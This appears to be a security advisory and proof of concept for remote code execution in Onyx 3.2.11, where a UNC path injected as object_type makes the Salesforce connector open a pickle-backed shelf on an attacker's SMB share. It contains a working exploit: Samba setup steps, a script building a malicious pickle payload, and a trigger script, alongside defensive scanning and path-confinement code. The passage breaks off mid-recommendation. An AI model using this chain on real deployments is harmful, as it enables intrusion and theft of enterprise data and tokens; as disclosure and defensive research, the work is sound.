Onyx - Version 3.2.11 / Remote Code Execution (RCE) via Insecure Deserialization based on Absolute Path Injection (UNC) in shelve.open
Below is one (1) way to reproduce the RCE in Onyx using an attacker-controlled SMB share. No third party has to modify local files for code to execute during deserialization.
For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).
Note: While this vulnerability is specifically verified and reported on version 3.2.11, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.
Introduction
Onyx (previously known as Danswer) is a popular open-source enterprise search and AI assistant platform. It connects with corporate data tools like Salesforce, Slack, Google Drive, and Confluence, allowing organizations to search across all internal knowledge bases using natural language queries. By indexing internal documents and integrating with Large Language Models (LLMs), it acts as a private, secure ChatGPT for company data.
The platform's importance lies in its role as a central search hub for critical, high-trust business data. To prevent performance bottlenecks, Onyx uses connectors that cache synchronized database objects with Python's native shelve module. When components like the Salesforce connector resolve cache locations dynamically from attributes like object_type, any path sanitization failure breaks the intended directory confinement and exposes a remote deserialization attack vector.
Vulnerability Description
The vulnerability stems from the unsafe use of os.path.join(BASE_DATA_PATH, object_type). In Python, if a component passed to os.path.join is an absolute path (or a Windows UNC path like \\attacker\share), all previous components are discarded.
An attacker supplying a Windows UNC path as the object_type forces the application to build the shelf database path on the attacker's remote SMB server, bypassing the local BASE_DATA_PATH.
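The path override described above can be reproduced in isolation. The following is a minimal sketch, not Onyx code: it calls ntpath (the Windows implementation behind os.path) directly so that it behaves the same on any host, the BASE_DATA_PATH value is a hypothetical placeholder, and the data.shelf file name is taken from the PoC comments later in this report.

```python
import ntpath  # Windows flavour of os.path, importable on every platform

# Hypothetical base directory; the real BASE_DATA_PATH value is not shown in this report.
BASE_DATA_PATH = r"C:\onyx\salesforce_cache"

# A normal object type stays under the base directory.
benign = ntpath.join(BASE_DATA_PATH, "Account")

# A UNC value carries its own "drive", so join() discards BASE_DATA_PATH entirely.
hijacked = ntpath.join(BASE_DATA_PATH, r"\\192.168.1.90\lab_share")

# Any file name appended afterwards now resolves on the remote share.
shelf_path = ntpath.join(hijacked, "data.shelf")

print(benign)
print(hijacked)
print(shelf_path)
```

On a Windows host, os.path.join is ntpath.join, so the same result applies to the unmodified application code.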
The vulnerability exists because shelve_utils.py allows redirecting the path towards the attacker, and shelve_functions.py blindly executes whatever is found at that path. If either of these two files were programmed securely, this specific vulnerability would not exist.
The vulnerable code in shelve_utils.py:
def get_object_type_path(object_type: str) -> str:
    """Get the directory path for a specific object type."""
    type_dir = os.path.join(BASE_DATA_PATH, object_type)  # <-- VULNERABLE PATH JOIN (Allows UNC path override)
    os.makedirs(type_dir, exist_ok=True)
    return type_dir
The vulnerable code in shelve_functions.py:
def get_record(object_id: str, object_type: str | None = None) -> SalesforceObject | None:
    ...
    shelf_path = get_object_shelf_path(object_type)
    with shelve.open(shelf_path) as db:  # <-- VULNERABLE SINK (Triggers pickle.loads() on value fetch)
        if object_id not in db:
            return None
        data = db[object_id]
To understand why the two files depend on each other for the vulnerability to exist, look at how the execution is chained:
- The Injection Facilitator (Path Injection in shelve_utils.py): The function takes the object_type argument and uses os.path.join. If it is a UNC path (e.g. \\192.168.1.90\lab_share), the function discards the local base directory, forcing the path to resolve to the attacker's server.
- The Execution Detonator (Deserialization Sink in shelve_functions.py): The program takes that remote path and passes it to shelve.open. The shelve library uses pickle underneath. When the code extracts data via db[object_id], it automatically executes pickle.loads(), detonating Remote Code Execution (RCE).
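The second link of the chain can be observed with a harmless payload. The sketch below is illustrative only: the Harmless class and the demo.shelf file name are made up for this example, and the callable is the builtin sorted rather than anything dangerous. It shows that reading a key from a shelf runs whatever callable the stored pickle names.

```python
import os
import shelve
import tempfile


class Harmless:
    """Stand-in for an attacker object; __reduce__ picks the callable run on load."""

    def __reduce__(self):
        # pickle stores "call sorted([3, 1, 2])" instead of the object itself.
        return (sorted, ([3, 1, 2],))


with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "demo.shelf")

    # Writing pickles the value immediately.
    with shelve.open(path) as db:
        db["key"] = Harmless()

    # Reading unpickles the value, which invokes the stored callable.
    with shelve.open(path) as db:
        value = db["key"]

# The fetch returned the result of sorted(), not a Harmless instance.
print(type(value).__name__, value)
```

Replacing sorted with eval or os.system, as the PoC payload below does, turns the same fetch into code execution.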
Technical Impact Analysis
Project Purpose & Context
Onyx is a unified AI search and assistant engine connecting multiple enterprise data stores (Salesforce, Google Drive, etc.). The Salesforce connector utilizes a caching mechanism via shelf databases to speed up repetitive query executions and reduce external API load.
Platform & Deployment Environment
Typically deployed using Docker/Kubernetes inside enterprise networks. If the container or VM runs in an environment resolving Windows UNC paths natively (or using OS integrations), it is highly vulnerable to remote path coercion via standard SMB shares.
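Whether a given object_type value escapes the base directory depends on which path rules the host applies. The following is a rough sketch that compares Windows and POSIX rules using only the standard library; escapes_base is a hypothetical helper written for this illustration, and the base directories and the /mnt/smb/lab_share mount point are assumptions, not Onyx defaults.

```python
import ntpath
import posixpath


def escapes_base(pathmod, base: str, object_type: str) -> bool:
    """Return True if joining object_type onto base leaves the base directory."""
    joined = pathmod.normpath(pathmod.join(base, object_type))
    base_norm = pathmod.normpath(base)
    return not (joined == base_norm or joined.startswith(base_norm + pathmod.sep))


unc = r"\\192.168.1.90\lab_share"

# Windows rules: the UNC value replaces the base directory.
windows_unc = escapes_base(ntpath, r"C:\onyx\data", unc)

# POSIX rules: backslashes are ordinary characters, so the UNC string stays inside the base.
posix_unc = escapes_base(posixpath, "/onyx/data", unc)

# POSIX rules: an absolute path (for example a mounted share) still replaces the base.
posix_abs = escapes_base(posixpath, "/onyx/data", "/mnt/smb/lab_share")

print(windows_unc, posix_unc, posix_abs)
```

Under these assumptions, the UNC form applies to hosts that use Windows path rules, while on POSIX hosts the equivalent override needs an absolute path.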
Comprehensive Risk Assessment
The vulnerability represents a Critical security risk. It allows an attacker to bypass directory confinement, force remote connections to an attacker-controlled share, and trigger unauthenticated code execution via pickle.loads() in the backend database cache resolver.
Attack Scenario
The attack targets the Salesforce database connection flow. An attacker hosts a malicious database file on their remote SMB share and feeds the UNC path parameter to the server via the object_type field. The server blindly loads the remote database file and deserializes the malicious object, giving the attacker reverse-shell access.
Who would want to exploit this vulnerability?
- Initial Access Brokers: To breach enterprise networks hosting internal instances of Onyx.
- Corporate Espionage Actors: To intercept indexed documents, Slack messages, or Salesforce records stored in the search platform.
For what gain?
Full system takeover of the AI search backend. This gives access to the sensitive enterprise data it indexes and to the authorization material it holds for connected platforms (Slack and Slackbot tokens, Google Workspace OAuth keys, Salesforce databases).
In what way?
By exploiting the behavior of os.path.join on absolute UNC inputs to force shelve.open into opening remote databases containing serialized exploits.
Reproduction steps
On the Raspberry (attacker) - IP 192.168.1.90
kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
Shared Resource Configuration (SMB):
1. Install Samba: sudo apt update && sudo apt install samba samba-common-bin -y.
2. Prepare the attack directory:
mkdir ~/lab_attack
chmod 755 /home/kw0
chmod -R 777 ~/lab_attack
3. Configure Samba: Add to the end of /etc/samba/smb.conf:
[lab_share]
path = /home/kw0/lab_attack
read only = no
guest ok = yes
Payload Generation on the Raspberry: Run the specialized exploit.py script to generate the shelf database files directly in the shared path:
import shelve
import os
import dbm.dumb

payload_dir = "/home/kw0/lab_attack/"
os.makedirs(payload_dir, exist_ok=True)
db_path = os.path.join(payload_dir, 'data.shelf')


class Exploit:
    def __reduce__(self):
        # Best Practice: Use 'or {}' so the result of the expression
        # is a dictionary, preventing crashes in the victim app.
        return (eval, ("__import__('os').system('calc.exe') or {}",))


# Use dbm.dumb explicitly to make sure these files are created:
# data.shelf.dat, data.shelf.dir and data.shelf.bak (Windows compatibility)
with dbm.dumb.open(db_path, 'c') as db:
    with shelve.Shelf(db) as shelf:
        shelf['malicious_key'] = Exploit()

print(f"[*] Malicious shelf database generated successfully at: {db_path}")
print("[*] Verify that .dat, .dir, and .bak files exist in the directory.")
python exploit.py
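A shelf produced this way can be examined without deserializing it. The sketch below is one possible approach and is not part of the original PoC: risky_opcodes and scan_dumb_shelf are hypothetical helper names, the opcode set is a reasonable but not exhaustive choice, and the demo writes a harmless shelf to a temporary directory instead of reading the lab share. It reads the raw bytes through dbm.dumb and walks them with pickletools.genops, which parses opcodes but never executes them.

```python
import dbm.dumb
import os
import pickletools
import shelve
import tempfile

# Opcodes that import or call objects during unpickling (not an exhaustive list).
CODE_EXECUTION_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE",
}


def risky_opcodes(raw: bytes) -> set[str]:
    """List risky opcodes in a pickle by parsing it, without loading it."""
    seen = {op.name for op, _arg, _pos in pickletools.genops(raw)}
    return seen & CODE_EXECUTION_OPCODES


def scan_dumb_shelf(path: str) -> dict[str, set[str]]:
    """Map each key of a dbm.dumb-backed shelf to the risky opcodes in its value."""
    report = {}
    with dbm.dumb.open(path, "r") as db:  # raw bytes only, no unpickling
        for key in db.keys():
            report[key.decode("utf-8", "replace")] = risky_opcodes(db[key])
    return report


class Harmless:
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))  # benign stand-in for a malicious callable


with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "data.shelf")
    with dbm.dumb.open(path, "c") as raw_db:
        with shelve.Shelf(raw_db) as shelf:
            shelf["plain"] = {"Id": "001"}
            shelf["suspicious"] = Harmless()
    report = scan_dumb_shelf(path)

print(report)
```

Plain data such as dictionaries of strings produces an empty set, while any value built through __reduce__ shows REDUCE together with a global lookup opcode.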
On Windows (victim) - IP 192.168.1.88
(.venv) PS L:\Deserializer\onyx> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
1. Create a .venv, activate it, and install the latest updated version (3.2.11) of Onyx by cloning the repository and using uv sync.
2. Enable the SMB share: net use Z: \\192.168.1.90\lab_share /persistent:no.
3. Run the specialized poc.py script to trigger the vulnerability:
from onyx.connectors.salesforce.shelve_stuff.shelve_functions import get_record

# 1. Define the UNC path pointing to the attacker's SMB share.
#    The application will append '\data.shelf' to this path.
#    So if object_type is '\\192.168.1.90\lab_share', the app looks for '\\192.168.1.90\lab_share\data.shelf'
attacker_unc_path = r"\\192.168.1.90\lab_share"

# 2. Define the object_id that matches the key we inserted into the malicious shelf
target_object_id = "malicious_key"

print(f"[*] Triggering get_record with UNC path: {attacker_unc_path}")

# 3. Call the vulnerable function
#    This will execute: shelve.open(r'\\192.168.1.90\lab_share\data.shelf')
#    and then access db['malicious_key'], triggering pickle.loads() and executing calc.exe
try:
    record = get_record(object_id=target_object_id, object_type=attacker_unc_path)
except Exception:
    # Expected to raise an exception or hang briefly while executing the payload
    pass

print("[*] Exploit execution finished.")
python poc.py
Executive Summary: RCE via UNC Path Injection and Insecure Deserialization in Onyx
The research identifies a critical Remote Code Execution (RCE) vulnerability in the Salesforce connector component of Onyx v3.2.11.
- Root Cause: The system uses os.path.join to construct file paths for shelve databases. Because os.path.join discards preceding path components when an absolute or UNC path is provided as the second argument, an attacker can override the intended BASE_DATA_PATH.
- Exploitation Mechanism: By supplying a malicious Windows UNC path (e.g., \\192.168.1.90\lab_share) as the object_type, the attacker forces the application to open a database hosted on a remote SMB share. As shelve uses pickle internally, accessing any key within this remote database triggers pickle.loads(), leading to immediate code execution.
Analysis of Scope and Security Implications
This vulnerability is of critical severity as it weaponizes legitimate Salesforce data synchronization logic to bypass file system isolation.
1. Infection Scenarios
- Enterprise Pivot: Onyx is an AI-powered enterprise search platform. An attacker exploiting this RCE can gain full control over the backend server, enabling lateral movement into connected enterprise data stores like Slack, Google Workspace, and Salesforce.
- UNC Redirection: In Windows-based deployment environments, the application’s reliance on native OS path resolution allows attackers to bypass local security controls, effectively turning any reachable SMB share into an RCE payload delivery system.
2. Factors Exacerbating Risk
- Chained Vulnerabilities: The impact relies on the combination of path hijacking (facilitated by shelve_utils.py) and the dangerous deserialization sink (found in shelve_functions.py). The chain is seamless, requiring zero interaction from the victim once the payload is placed on the remote share.
- High-Value Data Access: Since the platform is designed to index and query sensitive enterprise data, successful RCE provides an attacker with a direct path to steal PII, internal API keys, and proprietary knowledge assets indexed by the platform.
Conclusion and Recommendation
This is a critical-severity vulnerability. The reliance on shelve (which wraps pickle) combined with insecure path construction creates a trivial and potent RCE vector.
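As a starting point for the path-construction half of the fix, the following is a hedged sketch of a confined path builder. It is not the project's code: safe_object_type_path, the allowlist pattern, and the rejects helper are assumptions made for illustration, and the pattern may need adjusting to the object type names the connector actually uses.

```python
import os
import re
import tempfile

# Assumed allowlist: letters, digits, and underscores only (covers names like Account or Custom__c).
_SAFE_NAME = re.compile(r"[A-Za-z0-9_]+")


def safe_object_type_path(base_dir: str, object_type: str) -> str:
    """Build a cache directory path that cannot leave base_dir (hypothetical helper)."""
    if not _SAFE_NAME.fullmatch(object_type):
        raise ValueError(f"invalid object_type: {object_type!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, object_type))
    # Defence in depth: confirm the resolved path is still under the base directory.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"object_type escapes base directory: {object_type!r}")
    return candidate


def rejects(base_dir: str, object_type: str) -> bool:
    """Return True if safe_object_type_path refuses the value."""
    try:
        safe_object_type_path(base_dir, object_type)
    except ValueError:
        return True
    return False


base = tempfile.mkdtemp()
accepted = safe_object_type_path(base, "Account")
unc_rejected = rejects(base, r"\\192.168.1.90\lab_share")
traversal_rejected = rejects(base, "../outside")
absolute_rejected = rejects(base, "/mnt/smb/lab_share")

print(accepted, unc_rejected, traversal_rejected, absolute_rejected)
```

Validating the name closes the redirection shown in this report, but it does not make shelve safe to use on files an attacker can write to.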
Suggested actions for the development team:
- Replace Shelve/Pickle: Immediately deprecate the use of shelve for database management. Replace it with a secure, non-executable data serialization format such as JSON or Protobuf paired with standard database d